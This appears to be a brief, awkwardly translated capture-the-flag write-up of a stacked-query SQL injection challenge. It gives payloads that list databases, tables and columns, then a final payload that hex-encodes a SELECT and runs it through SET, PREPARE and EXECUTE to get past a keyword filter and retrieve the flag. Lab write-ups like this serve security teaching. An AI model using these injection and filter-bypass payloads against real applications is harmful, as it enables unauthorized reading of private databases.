Open Environment
Follow the prompts should be sql injection
Check the database name, and data tables
1';show databases;#
1';show tables;#
Check the fields of the table (1 '; desc `1919810931114514`; #)
Keyword discovery flag, query
After filtration injection found
The following code found during the injection
Thus the use of a combination set and prepare, using bypass select bypass authentication hexadecimal
Hexadecimal ( the SELECT * from 1919810931114514` ),
Payload structure is as follows
1';SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
Successfully got flag